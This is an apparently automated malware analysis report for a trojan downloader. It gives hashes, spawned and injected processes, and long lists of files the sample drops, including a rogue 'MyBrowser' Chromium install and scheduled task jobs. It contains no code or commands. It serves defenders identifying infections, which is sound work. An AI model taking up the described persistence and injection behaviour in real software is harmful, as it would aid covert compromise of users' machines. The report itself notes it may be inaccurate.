Skip to main content

Trojan.NSIS.StartPage_f90f8d3177


Trojan-Downloader.Win32.Genome.sxuj (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: f90f8d317708fadfed5349db278545ea

SHA1: 3cdeb2369fd132d5b653026003bd0c09970a5591

SHA256: 121f71089682c237aa66943e4f19104c52d4113558ea01073995fdd20bf13d34

SSDeep: 6144:5zffoUzv5wCyfy4Uq9qFJ22uKjJqmoLosIo9jas/Q3NuBuV27xeWhPAG1RJ2TcFT:GUreCM9mJ2254to6aAQ3oB027F5oTneZ

Size: 274102 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2009-12-06 00:50:35

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nsq18.tmp:1164
6471.exe:1916
chrome.exe:2304
chrome.exe:2268
chrome.exe:2216
chrome.exe:1980
chrome.exe:2252
nsq21.tmp:168
nso13.tmp:508
6481.exe:1988
tmp25.tmp:3448
setup.exe:576
setup.exe:240
tmp24.tmp.exe:1492
nsj1B.tmp:1648
dwwin.exe:2404
nsu5.tmp:468
nssF.tmp:1668
%original file name%.exe:1364
FlashPlayerUpdateService.exe:3536

The Trojan injects its code into the following process(es):

avg23.exe:1836
adv_128.exe:1660

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process nsq18.tmp:1164 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6471.exe (14988 bytes)

The process 6471.exe:1916 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].002 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\etsy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\search.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\chrome.packed.7z (1304956 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_finance.ico (2993 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gmail.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\target.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\9gag.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\priceline.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail.ru.ico (1909 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (0 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E (0 bytes)

The process chrome.exe:1980 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\30.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KyoUMYnZgcIULmW (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\27.tmp (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons (4342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2C.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\2D.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\LOG (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\README (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_yOentjedkNlWMUS (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\32.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Visited Links (284 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\31.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\26.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History (21181 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_r6aGBN8ReJ2GMKt (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_2 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites-journal (12948 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2B.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data (22997 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2E.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_1 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_0 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_3 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History-journal (4756 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2A.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\28.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data-journal (1580 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\29.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_sUlVw20TbJznEkx (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\First Run (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7db7_appcompat.txt (13516 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites (5232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2F.tmp (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF8d55a.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RFa48ef.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF998e8.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF92399.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF8fc79.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF9e728.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF94ab9.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RFa21cf.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF9bff8.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Local State~RF98531.TMP (0 bytes)

The process nsq21.tmp:168 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\avg23.exe (43108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe (162513 bytes)

The process nso13.tmp:508 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf16.tmp (5641 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp15.tmp (0 bytes)

The process tmp25.tmp:3448 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\Macromed\Flash\FlashInstall.log (2 bytes)
%System%\FlashPlayerApp.exe (3851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (1779 bytes)
%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll (121304 bytes)
%System%\Macromed\Flash\manifest.json (2 bytes)
%System%\Macromed\Flash\pepper.vch (1697 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (7386 bytes)
%System%\Macromed\Flash\FlashPlayerUpdateService.exe (268 bytes)
%System%\FlashPlayerCPLApp.cpl (142 bytes)
%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3} (0 bytes)

The process setup.exe:576 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
